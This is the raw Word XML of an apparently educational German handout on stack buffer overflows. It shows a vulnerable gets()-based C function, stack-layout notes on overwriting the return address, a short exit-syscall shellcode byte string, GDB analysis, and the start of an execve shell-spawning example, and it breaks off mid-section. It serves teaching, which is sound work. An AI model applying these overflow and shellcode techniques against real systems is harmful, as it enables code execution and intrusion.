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1A40" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="Titel"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Overlow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r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– temporärer Platz im Speicher der zur Speicherung von Daten genutzt wird</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Overflow – Passiert, wenn Daten in den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> geschrieben werden, die Größer sind als der </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> und aufgrund nicht ausreichend geprüfter Grenzen des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, und angrenzende Speicherbereiche überschreiben</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:r>
        <w:t>Eine einfache angreifbare Funktion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC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85837</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4000500" cy="1138443"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24130"/>
                <wp:wrapNone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000500" cy="113844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C49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
                            <w:pPr>
                              <w:pStyle w:val="KeinLeerraum"/>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>GetInput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[8]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ge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ab/>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>puts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buffer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FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC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17.75pt;margin-top:6.75pt;width:315pt;height:89.6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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
                      <w:pPr>
                        <w:pStyle w:val="KeinLeerraum"/>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>GetInput</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>()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{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[8]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ge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ab/>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>puts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buffer</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC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roofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() prüft nicht ob die Größe der Eingabe &gt; als die Größe des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Buffers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Remember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Layout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRPr="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:r>
        <w:object w:dxaOrig="6765" w:dyaOrig="8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9pt;height:287.2pt" o:ole="">
            <v:imagedata r:id="rId8" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1411797913" r:id="rId9"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Layout unseres angreifbaren Programms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:r>
        <w:object w:dxaOrig="6028" w:dyaOrig="9345">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:301.45pt;height:467.6pt" o:ole="">
            <v:imagedata r:id="rId10" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1411797914" r:id="rId11"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r>
        <w:t>Beobachtungen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>12 Byte müssen aufgefüllt werden um zu RET zu kommen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Dann müssen die nächsten 4 Byte gefüllt werden für den neuen Wert von RET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wenn die Funktion zu Ende ist, wird der neue RET Wert genutzt um zu entscheiden was als nächstes ausgeführt wird</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/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Wenn wir die Kontrolle über die Return Adresse haben, können wir ihn auf „unseren ausführbaren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>“ zeigen lassen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Payload ist Maschinencode welcher direkt von der CPU ausgeführt wird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 xml:space="preserve">Dieser Payload wird </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> genannt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Standardmäßig wird es genutzt um eine Shell zu öffnen, daher der Name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> umwandeln</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11"/>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Code in C schreiben und ausführbare Datei erstell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Disassemblen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der ausführbaren Datei und Assembler äquivalent betracht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Unnötigen Code entfernen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Code in Assembler neu schreiben</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A52A11" w:rsidRPr="008B1A26" w:rsidRDefault="00A52A11" w:rsidP="00A52A11">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> benutzen, um den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> herauszufinden:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> –d &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>assemblerdatei</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A52A11">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRPr="00A52A11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2D81E75" wp14:editId="78153ADA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>225425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1488440" cy="1366520"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="Textfeld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8440" cy="13665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>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it</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>(0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feld 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.85pt;width:117.2pt;height:107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>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it</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>(0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B4E5AE2" wp14:editId="58013EEE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2054420</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>112506</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1488880" cy="1367043"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="3" name="Textfeld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8880" cy="13670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</w:t>
                            </w:r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 xml:space="preserve"> :</w:t>
                            </w:r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20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8B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
                            <w:pPr>
                              <w:pStyle w:val="Kopfzeile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3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:161.75pt;margin-top:8.85pt;width:117.25pt;height:107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opfzeile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>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</w:t>
                      </w:r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 xml:space="preserve"> :</w:t>
                      </w:r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20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8B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
                      <w:pPr>
                        <w:pStyle w:val="Kopfzeile"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">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</w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="00FC49EC" w:rsidRDefault="00FC49EC" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="00FC49EC"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExitShellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ausführen</w:t>
      </w:r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03617</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3889180" cy="2510043"/>
                <wp:effectExtent l="0" t="0" r="16510" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="4" name="Textfeld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89180" cy="2510043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>[] = "\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xbb</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x14\x00\x00\x00"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               "\xb8\x01\x00\x00\x00"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               "\</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>xcd</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>\x80"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*)&amp;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 xml:space="preserve"> +2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(*</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>ret</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>) = 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>)</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>shellcode</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">;    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4" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:8.15pt;width:306.25pt;height:197.6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>[] = "\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xbb</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x14\x00\x00\x00"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               "\xb8\x01\x00\x00\x00"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               "\</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>xcd</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>\x80"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*)&amp;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 xml:space="preserve"> +2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(*</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>ret</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>) = 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>)</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>shellcode</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">;    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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verschiebt nach dem Start des Programms, die Speicheradresse des </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcodes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in die Return Adresse, und überschreibt die eigentliche Return Adresse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Analyse mit GDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295205A1" wp14:editId="4AAEACC2">
            <wp:extent cx="3619500" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Grafi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fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
        <w:r w:rsidR="00536AB5">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der Mainfunktion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7558FEBB" wp14:editId="723147CA">
            <wp:extent cx="5746159" cy="4497105"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0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437" cy="4510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fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
        <w:r w:rsidR="00536AB5">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - ESP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>register</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sowie Code an der aktuellen RET Adresse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRPr="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C0684C" wp14:editId="606DF291">
            <wp:extent cx="5667375" cy="952500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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737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fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
        <w:r w:rsidR="00536AB5">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - ESP nach Überschreibung des RET Wertes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRPr="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26"/>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E57BBBC" wp14:editId="06CA0759">
            <wp:extent cx="5695950" cy="200977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rt3_4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1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Abbildung </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Abbildung \* ARABIC ">
        <w:r w:rsidR="00536AB5">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> der Aktuellen RET Adresse - zeigt auf unseren </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A2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8B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zum Öffnen einer Shell schreiben</w:t>
      </w:r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396064</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130936</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="685800" cy="2396490"/>
                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="10" name="Geschweifte Klammer rechts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396490"/>
                        </a:xfrm>
                        <a:prstGeom prst="rightBrace">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val 85895"/>
                            <a:gd name="adj2" fmla="val 50839"/>
                          </a:avLst>
                        </a:prstGeom>
                        <a:ln w="254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Geschweifte Klammer rechts 10" o:spid="_x0000_s1026" type="#_x0000_t88" style="position:absolute;margin-left:188.65pt;margin-top:10.3pt;width:54pt;height:188.7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" adj="5309,10981" strokecolor="black [3213]" strokeweight="2pt"/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30936</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1946080" cy="2396999"/>
                <wp:effectExtent l="0" t="0" r="16510" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="9" name="Textfeld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46080" cy="23969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io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#</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>include</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> &lt;</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>stdlib.h</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>&gt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proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>main</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>()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{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char</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> *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2]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0]=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1]=NULL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ecve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0],</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>args,NULL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exit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>(0);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
                            <w:pPr>
                              <w:pStyle w:val="KeinLeerraum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9" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:10.3pt;width:153.25pt;height:188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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
                <v:fill opacity="52428f"/>
                <v:textbox>
                  <w:txbxContent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io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#</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>include</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> &lt;</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>stdlib.h</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>&gt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proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>main</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>()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{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char</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> *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2]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0]=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1]=NULL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ecve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0],</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>args,NULL</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>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exit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>(0);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="008B1A26" w:rsidRDefault="008B1A26" w:rsidP="008B1A26">
                      <w:pPr>
                        <w:pStyle w:val="KeinLeerraum"/>
                      </w:pPr>
                      <w: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076575</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>247538</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="343368"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone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34336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B1A26" w:rsidRDefault="008B1A26">
                            <w:r>
